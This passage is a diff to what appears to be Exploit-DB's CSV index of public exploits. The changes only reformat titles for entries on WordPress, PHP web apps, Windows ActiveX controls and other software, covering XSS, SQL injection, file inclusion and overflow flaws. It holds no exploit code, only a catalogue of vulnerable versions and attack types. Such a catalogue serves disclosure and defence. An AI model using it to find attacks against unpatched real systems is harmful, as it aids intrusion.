Kundrak",linux,dos,0 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 Modules_Dir Remote File Include Vulnerability",2007-01-24,"Dr Max Virus",php,webapps,0 -29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x Pingback SourceURI Denial of Service and Information Disclosure Vulnerability",2007-01-24,"Blake Matheny",php,webapps,0 +29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service and Information Disclosure Vulnerability",2007-01-24,"Blake Matheny",php,webapps,0 29523,platforms/osx/dos/29523.txt,"Apple 10.4.x Software Update Format String Vulnerability",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution Vulnerability",2007-01-25,Symantec,windows,remote,0 29525,platforms/php/webapps/29525.txt,"Wordpress Highlight Premium Theme - CSRF File Upload Vulnerability",2013-11-10,DevilScreaM,php,webapps,0 @@ -26588,7 +26588,7 @@ id,file,description,date,author,platform,type,port 29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 -29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 +29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 - Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/local/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,local,0 29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0 @@ -26618,7 +26618,7 @@ id,file,description,date,author,platform,type,port 29564,platforms/php/webapps/29564.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 -29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 User_Agent Error Page Cross-Site Scripting Vulnerability",2007-02-05,digi7al64,cfm,webapps,0 +29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting Vulnerability",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Include Vulnerabilities",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.PHP3 - Remote File Include Vulnerability",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF Vulnerability",2013-11-13,"Hubert Gradek",hardware,webapps,0 @@ -26649,7 +26649,7 @@ id,file,description,date,author,platform,type,port 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 P Parameter Directory Traversal Vulnerability",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 Default.APSX Cross-Site Scripting Vulnerability",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server SearchResults.ASPX Cross-Site Scripting Vulnerability",2007-02-12,BL4CK,asp,webapps,0 -29598,platforms/php/webapps/29598.txt,"Wordpress 1.x/2.0.x Templates.PHP Cross-Site Scripting Vulnerability",2007-02-12,PsychoGun,php,webapps,0 +29598,platforms/php/webapps/29598.txt,"Wordpress 1.x/2.0.x - Templates.PHP Cross-Site Scripting Vulnerability",2007-02-12,PsychoGun,php,webapps,0 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 Error.PHP Cross-Site Scripting Vulnerability",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter XSS",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 @@ -26748,7 +26748,7 @@ id,file,description,date,author,platform,type,port 29699,platforms/novell/remote/29699.txt,"Novell Access Management SSLVPN Server Security Bypass Vulnerability",2007-03-02,anonymous,novell,remote,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 ViewBugs.php s Variable SQL",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 Login.php PATH_INFO Parameter XSS",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 Register.php PATH_INFO Parameter XSS",2007-02-26,CorryL,php,webapps,0 @@ -26800,7 +26800,7 @@ id,file,description,date,author,platform,type,port 29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 PHP-Stats-Options.PHP Remote Code Execution Vulnerability",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP <= 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) <= 4.13 Command File_PrintF Integer Underflow Vulnerability",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 -29754,platforms/php/webapps/29754.html,"WordPress 2.x PHP_Self Cross-Site Scripting Vulnerability",2007-03-19,"Alexander Concha",php,webapps,0 +29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting Vulnerability",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 Administrator Password Change Vulnerability",2007-03-19,Kacper,php,webapps,0 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 @@ -26886,7 +26886,7 @@ id,file,description,date,author,platform,type,port 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0 -30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 +30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 @@ -26939,7 +26939,7 @@ id,file,description,date,author,platform,type,port 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0 +29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 @@ -26960,7 +26960,7 @@ id,file,description,date,author,platform,type,port 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 -29857,platforms/windows/remote/29857.rb,"Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0 +29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,metasploit,windows,remote,0 29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,metasploit,windows,remote,0 29859,platforms/java/remote/29859.rb,"Apache Roller OGNL Injection",2013-11-27,metasploit,java,remote,8080 29860,platforms/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability",2007-04-15,"Matousec Transparent security",windows,dos,0 @@ -27044,7 +27044,7 @@ id,file,description,date,author,platform,type,port 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service Vulnerability",2007-05-02,"Eelko Neven",windows,dos,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 Logout.PHP Remote File Include Vulnerability",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T Var:RelaodHref Cross-Site Scripting Vulnerability",2007-05-03,"Tim Brown",hardware,remote,0 -29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0 +29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes - CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 @@ -27131,7 +27131,7 @@ id,file,description,date,author,platform,type,port 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross-Site Scripting Vulnerability",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk Mods.PHP Cross-Site Scripting Vulnerability",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability",2013-12-06,LiquidWorm,php,webapps,0 -30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery plugins Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 +30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 Index.PHP Cross-Site Scripting Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0 @@ -27262,7 +27262,7 @@ id,file,description,date,author,platform,type,port 30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti Index.ASP SQL Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent XSS",2013-12-16,hellok,php,webapps,0 @@ -27303,7 +27303,7 @@ id,file,description,date,author,platform,type,port 30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client Local Buffer Overflow Vulnerability",2007-07-26,qaaz,aix,local,0 30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0 -30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0 +30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 - HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0 30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 @@ -27418,7 +27418,7 @@ id,file,description,date,author,platform,type,port 30517,platforms/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone Remote Denial of Service Vulnerability",2007-08-22,MADYNES,hardware,dos,0 30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x pages/delete_page.php id Parameter SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 30519,platforms/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow Vulnerability",2007-08-22,"Luigi Auriemma",multiple,dos,0 -30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 Pool Index.PHP Cross-Site Scripting Vulnerability",2007-08-13,MustLive,php,webapps,0 +30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool Index.PHP Cross-Site Scripting Vulnerability",2007-08-13,MustLive,php,webapps,0 30521,platforms/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote,0 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow Vulnerability",2007-08-23,"Luigi Auriemma",multiple,remote,0 @@ -27496,7 +27496,7 @@ id,file,description,date,author,platform,type,port 32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0 32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0 -32410,platforms/php/webapps/32410.txt,"6rbScript 'cat.php' SQL Injection Vulnerability",2008-09-22,"Karar Alshami",php,webapps,0 +32410,platforms/php/webapps/32410.txt,"6rbScript - 'cat.php' SQL Injection Vulnerability",2008-09-22,"Karar Alshami",php,webapps,0 32389,platforms/php/webapps/32389.txt,"Quick Cart <= 3.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-17,"John Cobb",php,webapps,0 32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting Vulnerability",2008-09-20,"Rohit Bansal",php,webapps,0 32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS 'tienda.php' SQL Injection Vulnerability",2008-09-21,r45c4l,php,webapps,0 @@ -27547,7 +27547,7 @@ id,file,description,date,author,platform,type,port 30599,platforms/cgi/webapps/30599.txt,"WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability",2007-09-20,7jdg,windows,remote,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 -30602,platforms/php/webapps/30602.html,"WordPress 2.0 wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 +30602,platforms/php/webapps/30602.html,"WordPress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 Password Parameter Arbitrary PHP Code Execution Vulnerability",2007-09-22,x0kster,php,webapps,0 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Local Privilege Escalation Vulnerability",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability",2007-09-21,Karimo_DM,linux,local,0 @@ -27643,7 +27643,7 @@ id,file,description,date,author,platform,type,port 30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 -31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0 +31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin - Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 @@ -27666,7 +27666,7 @@ id,file,description,date,author,platform,type,port 30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 -30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP - Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.PHP Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0 @@ -27714,7 +27714,7 @@ id,file,description,date,author,platform,type,port 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 -30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin Cross-Site Scripting Vulnerability",2007-11-13,"Fracesco Vaj",php,webapps,0 +30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting Vulnerability",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service Vulnerability",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.PHP Unauthorized Access Vulnerability",2007-11-14,d3hydr8,php,webapps,0 30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 @@ -27803,7 +27803,7 @@ id,file,description,date,author,platform,type,port 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection Vulnerability",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 -30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 +30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 @@ -27880,7 +27880,7 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 - wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0 @@ -27981,11 +27981,11 @@ id,file,description,date,author,platform,type,port 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting Vulnerability",2008-02-02,Crackers_Child,php,webapps,0 -31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 31093,platforms/php/webapps/31093.txt,"ITechClassifieds ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 31094,platforms/php/webapps/31094.txt,"ITechClassifieds ViewCat.php CatID Parameter XSS",2008-02-02,Crackers_Child,php,webapps,0 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 -31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0 +31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting Vulnerability",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0 @@ -28131,7 +28131,7 @@ id,file,description,date,author,platform,type,port 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-02-18,NBBN,php,webapps,0 